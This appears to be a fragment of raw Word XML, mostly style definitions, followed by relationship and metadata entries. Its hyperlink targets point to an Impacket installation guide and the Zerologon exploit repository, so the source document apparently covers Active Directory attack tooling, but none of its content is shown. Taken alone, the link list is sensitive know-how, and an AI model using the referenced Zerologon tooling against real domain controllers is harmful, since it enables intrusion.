      <w:ind w:left="283" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="845">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="567" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="846">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="850" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="847">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1134" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="848">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1417" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="849">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1701" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="850">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1984" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="851">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="2268" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="852">
    <w:name w:val="TOC Heading"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="853">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="0" w:afterAutospacing="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="854">
    <w:name w:val="Normal"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="855">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="854"/>
    <w:next w:val="854"/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="400" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="856">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="854"/>
    <w:next w:val="854"/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="857">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="854"/>
    <w:next w:val="854"/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="320" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="434343"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="858">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="854"/>
    <w:next w:val="854"/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="280" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="666666"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="859">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="854"/>
    <w:next w:val="854"/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="860">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="854"/>
    <w:next w:val="854"/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="861">
    <w:name w:val="Title"/>
    <w:basedOn w:val="854"/>
    <w:next w:val="854"/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="862">
    <w:name w:val="Normal"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="863">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="400" w:after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="864">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="865">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="320" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="434343"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="866">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="280" w:after="80"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="666666"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="867">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="868">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="869" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="table" w:styleId="8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1" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="table" w:styleId="872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73">
    <w:name w:val="Title"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="874">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:after="320"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="666666"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="875" w:customStyle="1">
    <w:name w:val="StGen0"/>
    <w:basedOn w:val="87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76" w:customStyle="1">
    <w:name w:val="StGen1"/>
    <w:basedOn w:val="87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877">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="869"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="0000ff" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="878">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="869"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="605e5c"/>
      <w:shd w:val="clear" w:color="auto" w:fill="e1dfdd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="879">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="862"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:contextualSpacing/>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="880">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="854"/>
    <w:next w:val="854"/>
    <w:pPr>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:keepLines/>
      <w:keepNext/>
      <w:pageBreakBefore w:val="0"/>
      <w:spacing w:before="0" w:after="320" w:line="276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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b w:val="0"/>
      <w:i w:val="0"/>
      <w:smallCaps w:val="0"/>
      <w:strike w:val="0"/>
      <w:color w:val="666666"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
      <w:u w:val="none"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:vertAlign w:val="baseline"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="881">
    <w:name w:val="StGen9"/>
    <w:basedOn w:val="872"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"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882">
    <w:name w:val="StGen10"/>
    <w:basedOn w:val="872"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"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netospace.ru/drive/d/s/11Jgbp9VIVQO5rI1ZhAQyFVoLWLE7Nnd/DjOP304ZZoLG9_luPhxbanilKuwlgJv2-ZL_ADDso5Qs" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.eldernode.com/install-and-use-impacket-on-kali-linux/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.eldernode.com/install-and-use-impacket-on-kali-linux/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/risksense/zerologon" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/risksense/zerologon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Wc+4vBg1cJsddNgex2Ugy/PQ+w==">CgMxLjAyDmguZTF3bHF6dGIybnRwMg5oLmpndHV1bXJlZThoaDIOaC5tbXN0dnFrNDF4NXEyDmguYWFjemwwN25xY3JkMg5oLnRlNzhycHVmZGMwdjIOaC5iMTBobG1heW1scGIyDmguNTZqNnp2ZG1xbWdnMg5oLm9vazNsZnAzNDliODIOaC5qbjdsMWxtemM4b3gyDmgudDVibDJseHlnMXV0Mg5oLm9lZXpib3Y4ZnB5dzIOaC53anRoNTlhcWF6ZnMyDWgubHRxcmF5enJ1NGM4AHIhMUYwRkV4eWl3c0NqaFZnRjk5dFphNEd5RmZFSmdIX0x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dvbubnov</dc:creator>
  <cp:lastModifiedBy>Тотуханум Атакаева</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-18T21:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-17T19:30:12Z</dcterms:modified>
</cp:coreProperties>
</file>